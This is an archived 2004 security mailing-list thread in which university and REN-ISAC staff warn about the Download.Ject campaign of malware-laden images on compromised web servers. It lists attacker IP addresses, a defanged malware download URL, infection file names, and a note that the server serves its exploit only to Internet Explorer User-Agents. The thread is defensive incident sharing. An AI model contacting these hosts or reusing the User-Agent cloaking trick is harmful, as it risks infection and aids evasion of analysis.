Educause Security Discussion mailing list archives
Re: malware in images
From: Kathy Bergsma <kathya () NERSP NERDC UFL EDU>
Date: Thu, 24 Jun 2004 12:45:44 -0400
In addition to 217.107.218.147, we detected similar exploits from the following addresses. 64.46.100.96 65.254.51.42 66.98.190.22 67.15.42.34 67.18.79.20 69.50.170.214 69.93.54.158 81.211.105.24 195.208.235.66 207.150.192.12 213.159.117.131 ============= Kathy Bergsma UF Information Security Manager 352-392-2061 On Thu, 24 Jun 2004, Doug Pearson wrote:
There's a bunch of folks scrambling at AV vendors, US-CERT, etc. to figure this one out. Some snippets of information include: - A large number of web servers were compromised with the malware, including many prominent sites. Those are being cleaned up as identified. The "RFI - Russians IIS Hacks?" described at http://isc.sans.org/diary.php appears to be related to this. - The URL (reported below) varies it's response according to the User-Agent string. From Mozilla or wget you get a broken link. If the User-Agent string is IE's, you get new.html which is a variation on the recent 0day using the redirection injection bug and java-script loaders. - Unconfirmed, but -possible- indication of infection is files Jjjknk32.exe, Edhmifcj.dll, and surf.dat files in the /windows/system32 directory. It appears that the site/URL listed below is still active. Highly recommend blocking at your network border. Regards, Doug Pearson Research and Education Networking ISAC http://www.ren-isac.net Watch Desk 24x7: +1(317)278-6630 ----- At 10:32 PM 6/23/2004 -0500, Doug Pearson wrote: There's *early* report of lots of sites infected with images that contain malware. The Javascript appended to the images reaches back to "http: // 217.107.218.147/ dot.php" to get the next dose of malware. The embedded spaces in the URL are mine to prevent accidental launches. I'm running a current Symantec AV on my desktop. SAV catches what's at the URL as: Scan type: Realtime Protection Scan Event: Virus Found! Virus name: Download.Ject File: [obfuscated by Doug P]new[1].htm [and so forth...] Sites may wish to apply local network filters to block 217.107.218.147! Regards, Doug Pearson Research and Education Networking ISAC http://www.ren-isac.net Watch Desk 24x7: +1(317)278-6630 ********** Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.
********** Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.
Current thread:
- malware in images Doug Pearson (Jun 23)
- <Possible follow-ups>
- Re: malware in images Doug Pearson (Jun 24)
- Re: malware in images Kathy Bergsma (Jun 24)
- Re: malware in images Brian Eckman (Jun 24)
- Re: malware in images Jordan Wiens (Jun 24)
- Re: malware in images Jeff Kell (Jun 24)